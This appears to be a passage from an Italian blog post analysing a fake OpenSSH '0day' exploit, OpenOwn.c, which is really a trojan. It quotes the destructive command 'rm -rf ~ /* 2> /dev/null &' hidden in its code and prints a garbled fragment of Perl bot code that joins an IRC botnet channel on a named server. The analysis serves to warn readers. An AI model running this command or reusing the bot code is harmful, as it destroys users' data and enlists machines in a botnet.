Ho scoperto che il falso exploit open-ssh “0day” apparso magicamente pochi giorni fa, e di cui ho già parlato qui, aveva già fatto la sua apparizione a metà luglio 2009 col nome di OpenOwn.c.
Esattamente come la sua reincarnazione, il falso exploit comprendeva tre stringhe di codice offuscato, definite come jmpcode[], shellcode[] ed fbsd_shellcode[].
Come già stabilito, jmpcode[] non è altro che una rappresentazione esadecimale di “rm -rf ~ /* 2> /dev/null &”, comando destinato a cancellare l’intero contenuto della home directory o, nel peggiore dei casi, della root directory, nel caso in cui venisse eseguito coi privilegi di root.
shellcode[] ed fbsd_shellcode[] aprono invece una connessione verso euIRC, un network di Internet Relay Chat, aggregandosi ad un canale “key-protected”, in definitiva arruolandosi in una botnet, come si puo arguire ad esempio dalla porzione di codice seguente:
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
Il falso exploit remoto (ma autenticissimo exploit...
Leggi il seguito »
- Articolo precedente: Nokia N97 : Trasformiamolo in un metal detector
- Articolo successivo: Mass Effect 2
SEGNALA / INVIA QUESTO POST:
Hai trovato questo articolo interessante? Iscriviti GRATIS ai nostri feeds!
